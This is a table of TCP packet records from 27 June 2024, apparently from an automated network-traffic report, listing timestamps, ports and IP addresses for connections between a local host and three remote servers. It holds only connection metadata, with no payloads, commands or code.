Jun 27, 2024 05:58:49.274919033 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.274947882 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.274960041 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275051117 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.275089025 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275091887 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.275099993 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275116920 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275127888 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275129080 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.275146008 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.275166035 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.275305986 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275377989 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275388956 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275398970 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275409937 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275429010 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.275444984 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.275700092 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275712013 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275722027 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.275744915 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.275762081 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.290703058 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.290736914 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.290765047 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.290785074 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.290811062 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.290821075 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.290848017 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.290987015 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.290997028 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.291006088 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.291016102 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.291026115 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.291027069 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.291048050 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.291062117 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.291305065 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.291316032 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.291325092 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.291349888 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.291380882 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.291495085 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.291506052 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.291536093 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.327195883 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327254057 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327265024 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327276945 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.327312946 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.327460051 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327470064 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327480078 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327491045 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327501059 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327502966 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.327521086 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.327538967 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.327805996 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327816010 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327825069 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327836037 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327846050 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327851057 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.327857018 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327867031 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327877045 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327878952 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.327888012 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:49.327898026 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:49.327920914 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:50.065326929 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:50.065876007 CEST	49730	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:50.070801973 CEST	80	49730	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:50.070818901 CEST	80	49729	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:50.070874929 CEST	49730	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:50.070923090 CEST	49729	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:50.082854033 CEST	49730	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:50.087672949 CEST	80	49730	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:50.603014946 CEST	49731	1110	192.168.2.7	4.184.236.127
Jun 27, 2024 05:58:50.607978106 CEST	1110	49731	4.184.236.127	192.168.2.7
Jun 27, 2024 05:58:50.608061075 CEST	49731	1110	192.168.2.7	4.184.236.127
Jun 27, 2024 05:58:50.618618965 CEST	49731	1110	192.168.2.7	4.184.236.127
Jun 27, 2024 05:58:50.623437881 CEST	1110	49731	4.184.236.127	192.168.2.7
Jun 27, 2024 05:58:50.759172916 CEST	80	49730	77.91.77.81	192.168.2.7
Jun 27, 2024 05:58:50.759238958 CEST	49730	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:58:50.764595985 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:50.769537926 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:50.769596100 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:50.769735098 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:50.774657965 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408123016 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408138990 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408154964 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408164978 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408175945 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408186913 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408196926 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408209085 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408219099 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408227921 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.408245087 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.408277988 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.413003922 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.413069010 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.413078070 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.413114071 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.502871037 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.502886057 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.502897024 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.502934933 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.502975941 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.502985001 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.502995968 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.503016949 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.503034115 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.503164053 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.503175020 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.503213882 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.503317118 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.503524065 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.503659964 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.503669977 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.503680944 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.503698111 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.503722906 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.503823996 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.503837109 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.503864050 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.504333019 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.504343987 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.504354000 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.504364967 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.504370928 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.504380941 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.504396915 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.504415035 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.505167961 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.505208015 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.505295038 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.505306005 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.505337000 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.505413055 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.505446911 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.507795095 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.507805109 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.507838964 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.598479033 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598498106 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598510981 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598531008 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.598546028 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598560095 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.598567963 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598578930 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598591089 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598598957 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.598608971 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598618031 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.598645926 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.598767042 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598778963 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598789930 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.598823071 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599029064 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599040985 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599057913 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599071026 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599081039 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599102974 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599129915 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599210024 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599221945 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599231958 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599267960 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599299908 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599379063 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599432945 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599452019 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599464893 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599488020 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599509001 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599636078 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599647045 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599657059 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599667072 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599677086 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599703074 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.599927902 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599939108 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599950075 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599961042 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.599977970 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.600011110 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.600317955 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.600367069 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.600389004 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.600399971 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.600425959 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.600442886 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.600553989 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.600564957 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.600574970 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.600589991 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.600594997 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.600610971 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.600632906 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.600786924 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.600825071 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.600833893 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.600845098 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.600874901 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.601078033 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.601150990 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.601161957 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.601170063 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.601182938 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.601196051 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.601275921 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.601288080 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.601298094 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.601311922 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.601346970 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.693989992 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694022894 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694035053 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694065094 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694083929 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694132090 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694144011 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694268942 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694277048 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694287062 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694322109 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694331884 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694430113 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694441080 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694457054 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694463968 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694473028 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694483042 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694490910 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694499016 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694505930 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694526911 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694744110 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694806099 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694813967 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694859028 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694865942 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694876909 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694886923 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.694897890 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.694915056 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.695044994 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695091963 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.695110083 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695121050 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695131063 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695142031 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695158958 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.695183992 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.695379972 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695415020 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.695453882 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695465088 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695498943 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.695621967 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695631027 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695641994 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695652008 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695657969 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.695687056 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.695961952 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695972919 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695986032 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.695997953 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696003914 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.696013927 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696022987 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696029902 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.696039915 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696046114 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.696072102 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.696357965 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696444035 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696454048 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696491003 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.696631908 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696640968 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696650982 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696660995 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696670055 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.696695089 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.696927071 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696937084 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696947098 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696958065 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696964025 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.696973085 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696980000 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.696988106 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.696999073 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697012901 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697031021 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697287083 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697324038 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697371960 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697381973 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697406054 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697555065 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697563887 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697573900 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697583914 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697591066 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697607040 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697629929 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697768927 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697803974 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697873116 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697881937 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697891951 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697901964 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697910070 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697918892 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697930098 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697940111 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.697947979 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.697966099 CEST	49732	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:58:51.698291063 CEST	80	49732	185.172.128.116	192.168.2.7
Jun 27, 2024 05:58:51.698328972 CEST	49732	80	192.168.2.7	185.172.128.116
